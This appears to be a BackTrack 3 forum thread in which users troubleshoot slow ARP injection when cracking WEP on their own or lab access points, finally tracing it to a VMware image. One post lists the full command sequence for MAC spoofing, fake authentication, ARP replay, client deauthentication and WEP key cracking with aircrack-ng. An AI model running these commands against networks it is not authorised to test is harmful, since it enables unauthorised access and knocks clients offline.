Page 1 of 2 12 LastLast

Thread: Aireplay ARP Injektion very slow using WUSB54

Just burned his ISO

Default Aireplay ARP Injektion very slow using WUSB54

Today I tried to crack my WEP with the BT3 Final Version.

I used aireplay to start ARP injection, but the speed was very slow.
    It took me very long to capture enough packets, actually it took so lang that I stoped the process.

I had no Problems with the BT3 Beta Version.
    I also tried to update the BT3 Beta with the aircrack 1.0 rc1 version and had the same problem.
    Might be a problem with the new aircrack-ng suit. BT3 Beta used aircracks beta version and BT3 final uses aircrack 1.0 rc1

Just to give some more information about my test scenario:

- Im using Linksys WUSB54 Wlan dongle
    - Injection is working
    - Rate is down at 1M
    - D-Link DI-624 Router

Hope you guys can help me

yeah the b54 is junk , expect that with a usb there puss!

try standing closer to the router !

Just burned his ISO

As I sayed, it is my test scenario, so I'm right infront of my AP.
    And with the beat version my WUSB worked just fine with aircrack.

There must be some other reason.
    [center]Bachelor professionel - computer systems and computer networks
    Cisco CCNA semester 1-4 completed[/center]

Just burned his ISO imported_Silver_Seven's Avatar

-=THX=-

You're not alone buddy ......... I am having the same issue but with the Alpha AWUS036H and ARP injection. I thought it may be because I was in the VMware build of BT3 Final, where BT3 Beta had no issues. I suspected something is maybe going on with the VM image as I had to upgrade to USB 2.0 in the VM as suggested by "DeathRay" in the "How-To" sub-category of the BT3 Final forum. To try another avenue, I am currently downloading a fresh ISO to build a new VM shell in WorkStation 6 ........ I will post any outcome that I see once I am done.

Quote Originally Posted by Silver_Seven View Post
    -=THX=-

You're not alone buddy ......... I am having the same issue but with the Alpha AWUS036H and ARP injection. I thought it may be because I was in the VMware build of BT3 Final, where BT3 Beta had no issues. I suspected something is maybe going on with the VM image as I had to upgrade to USB 2.0 in the VM as suggested by "DeathRay" in the "How-To" sub-category of the BT3 Final forum. To try another avenue, I am currently downloading a fresh ISO to build a new VM shell in WorkStation 6 ........ I will post any outcome that I see once I am done.
    There should be no reason for the Alfa 500mw to perform badly in a VMware setup as USB wireless cards are fully supported and the AWUS036H should work with USB 1.0 as well as 2.0.

Another reason I think the origin of the problem might be found in your procedure or commands is that plenty of people on this forum use this particular card and have not mentioned any problems with using it in WMvare.
    -Monkeys are like nature's humans.

Quote Originally Posted by =Tron= View Post
    There should be no reason for the Alfa 500mw to perform badly in a VMware setup as USB wireless cards are fully supported and the AWUS036H should work with USB 1.0 as well as 2.0.

Another reason I think the origin of the problem might be found in your procedure or commands is that plenty of people on this forum use this particular card and have not mentioned any problems with using it in WMvare.

Tron,

Exactly my thoughts man, this is what I was tripping on. I have done this countless times in a VM with BT3 Beta flawlessly. Only difference now is that I am using the pre-made VM for BT3 Final. Very bizarre !!! ....... As for the commands I am using, I am just using the basics as seen here:

airmon-ng stop wlan0 <stop monitor mode on card>
    ifconfig wlan0 down <shut down card>
    macchanger --mac 00:11:22:33:44:55 wlan0 <spoof MAC>
    airmon-ng start wlan0 <start monitor mode on card>
    airodump-ng wlan0 <scan air to find target>

From there I find my Airespace AP in my lab with WEP. I then then grabbed it specifically as seen here:

airodump-ng -c 6 -w Capture_FileName --bssid 00:0B:85:XX:XX:XX wlan0 <sniff target>

At this point, I begin to zero in on the attack:

aireplay-ng -1 0 -a 00:0B:85:XX:XX:XX -h 00:11:22:33:44:55 wlan0 <fake auth>
    aireplay-ng -3 -b 00:0B:85:XX:XX:XX -h 00:11:22:33:44:55 wlan0 <sniff and create an ARP storm>

This is where things drastically pipe down and stumble along at a slow crawl. The only other thing I do is "Deauth" the client to speed up an ARP possibility. Such as:

aireplay-ng -0 1 -a 00:0B:85:XX:XX:XX -c 00:1A:E9:XX:XX:XX wlan0 <Deauth client>

From there, if the speed was available as in other machines I use, I would finish off with the WEP cracking command:

aircrack-ng -n 128 --bssid 00:0B:85:XX:XX:XX Capture_FileName.cap <crack WEP key>

Call me blind or as I never seem to get enough sleep, am I missing something ......... Just for giggles though, I will still try to do a new install from the BT3 Final ISO in a new VMware WorkStation 6 shell. Please do let me know if you see any mistakes in my CLI. Later !!!

Just burned his ISO

First of: Nice to know I´m not alone

In my opinion it must be something with the version of aircrack, because in the BT3 beta aircrack is beta too. BT3 final habs the newer aircrack 1.0 version.

With BT3 beta I tried to update aircrack-ng. After the update the same problem came up like with the BT3 final version.
    [center]Bachelor professionel - computer systems and computer networks
    Cisco CCNA semester 1-4 completed[/center]

In my opinion it must be something with the version of aircrack, because in the BT3 beta aircrack is beta too. BT3 final habs the newer aircrack 1.0 version.
    First of all I can confirm that it has nothing to do with the version of aircrack-ng as the same version is used in the USB version of BT3F that I use and the VMware image and I haven’t experienced any issues with injection on my Alfa.

Call me blind or as I never seem to get enough sleep, am I missing something ......... Just for giggles though, I will still try to do a new install from the BT3 Final ISO in a new VMware WorkStation 6 shell. Please do let me know if you see any mistakes in my CLI. Later !!!
    I think this would be a good method to narrow down the possible source of the problem as I know that injection on the USB/CD iso works flawlessly as a live set-up and HD install. There is nothing wrong with the commands that you use so the only other reason for why you are having problems that I can think of would be related to the update for USB2.0 support that you made on the VMware image. And as you state that you had no problems with injecting in VMware using BT3b I think the problem may wery well be sorted out by using the CD/USB image instead of the premade VMware.
    -Monkeys are like nature's humans.

Quote Originally Posted by =Tron= View Post
    I think this would be a good method to narrow down the possible source of the problem as I know that injection on the USB/CD iso works flawlessly as a live set-up and HD install. There is nothing wrong with the commands that you use so the only other reason for why you are having problems that I can think of would be related to the update for USB2.0 support that you made on the VMware image. And as you state that you had no problems with injecting in VMware using BT3b I think the problem may wery well be sorted out by using the CD/USB image instead of the premade VMware.
    Sorry it took me all weekend as I was very lazy here the past couple days ......... It is definitely something in the VMware image as I just built a brand new one in WorkStation 6.0 from the BT3 Final ISO and it works like a charm. Or it is the USB 2.0 upgrade as Tron was stating. So I recommend just building a new image there -=THX=- ......... Hope this helps

Quote Originally Posted by Silver_Seven View Post
    Sorry it took me all weekend as I was very lazy here the past couple days ......... It is definitely something in the VMware image as I just built a brand new one in WorkStation 6.0 from the BT3 Final ISO and it works like a charm. Or it is the USB 2.0 upgrade as Tron was stating. So I recommend just building a new image there -=THX=- ......... Hope this helps
    glad ya got it fixed i use my alfa im vmware when i dont wanna reboot and ive never had any problems ...

Page 1 of 2 12 LastLast